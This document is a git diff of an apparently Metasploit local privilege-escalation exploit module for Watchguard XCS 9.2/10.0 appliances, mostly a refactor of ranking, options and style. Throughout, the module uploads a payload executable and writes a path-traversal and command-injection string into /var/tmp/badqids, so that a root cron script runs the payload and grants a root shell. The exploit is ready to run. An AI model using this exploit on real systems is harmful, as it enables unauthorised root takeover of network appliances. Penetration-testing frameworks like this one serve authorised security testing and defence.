diff --git a/modules/exploits/freebsd/misc/watchguard_local_privesc.rb b/modules/exploits/freebsd/misc/watchguard_local_privesc.rb index b8d37f80dc..e7e2edd748 100644 --- a/modules/exploits/freebsd/misc/watchguard_local_privesc.rb +++ b/modules/exploits/freebsd/misc/watchguard_local_privesc.rb @@ -7,7 +7,10 @@ require 'msf/core' class Metasploit4 < Msf::Exploit::Local - Rank = ExcellentRanking + # It needs 3 minutes wait time + # WfsDelay set to 180, so it should be a Manual exploit, + # to avoid it being included in automations + Rank = ManualRanking include Msf::Exploit::EXE include Msf::Post::File @@ -27,68 +30,73 @@ class Metasploit4 < Msf::Exploit::Local 'License' => MSF_LICENSE, 'References' => [ - ['URL','http://security-assessment.com/files/documents/advisory/Watchguard-XCS-final.pdf'] + ['URL', 'http://security-assessment.com/files/documents/advisory/Watchguard-XCS-final.pdf'] ], 'Platform' => 'bsd', 'Arch' => ARCH_X86_64, - 'SessionTypes' => [ 'shell' ], - 'Privileged' => false, + 'SessionTypes' => ['shell'], + 'Privileged' => true, 'Targets' => [ [ 'Watchguard XCS 9.2/10.0', { }] ], + 'DefaultOptions' => { 'WfsDelay' => 180 }, 'DefaultTarget' => 0, 'DisclosureDate' => 'Jun 29 2015' )) end + def setup + @pl = generate_payload_exe + if @pl.nil? + fail_with(Failure::BadConfig, 'Please select a native bsd payload') + end + + super + end + def check #Basic check to see if the device is a Watchguard XCS res = cmd_exec('uname -a') - return Exploit::CheckCode::Appears if res =~ /support-xcs@watchguard.com/ + return Exploit::CheckCode::Detected if res && res.include?('support-xcs@watchguard.com') Exploit::CheckCode::Safe end def upload_payload - #Generates and uploads the payload to the device fname = "/tmp/#{Rex::Text.rand_text_alpha(5)}" - @pl = generate_payload_exe + write_file(fname, @pl) - return nil if not file_exist?(fname) + return nil unless file_exist?(fname) cmd_exec("chmod +x #{fname}") - return fname + + fname end def exploit - print_status("Rooting can take up to 3 minutes.") + print_warning('Rooting can take up to 3 minutes.') #Generate and upload the payload filename = upload_payload - fail_with(Failure::NotFound, "Payload failed to upload") if filename.nil? + fail_with(Failure::NotFound, 'Payload failed to upload') if filename.nil? print_status("Payload #{filename} uploaded.") #Sets up empty dummy file needed for privesc dummy_filename = "/tmp/#{Rex::Text.rand_text_alpha(5)}" cmd_exec("touch #{dummy_filename}") - vprint_status("Added dummy file") + vprint_status('Added dummy file') #Put the shell injection line into badqids #setup_privesc = "echo \"../../../../../..#{dummy_filename};#{filename}\" > /var/tmp/badqids" - badqids = write_file("/var/tmp/badqids","../../../../../..#{dummy_filename};#{filename}") - fail_with(Failure::NotFound, "Failed to create badqids file to exploit crontab") if badqids.nil? - print_status("Badqids created, waiting for vulnerable script to be called by crontab...") + badqids = write_file('/var/tmp/badqids', "../../../../../..#{dummy_filename};#{filename}") + fail_with(Failure::NotFound, 'Failed to create badqids file to exploit crontab') if badqids.nil? + print_status('Badqids created, waiting for vulnerable script to be called by crontab...') #cmd_exec(setup_privesc) #Cleanup the files we used - register_file_for_cleanup("/var/tmp/badqids") + register_file_for_cleanup('/var/tmp/badqids') register_file_for_cleanup(dummy_filename) register_file_for_cleanup(filename) - - #Wait for crontab to run vulnerable script - select(nil,nil,nil,180) #Wait 3 minutes to ensure cron script is run - print_status("Ran out of time, should have root shell by now.") - end end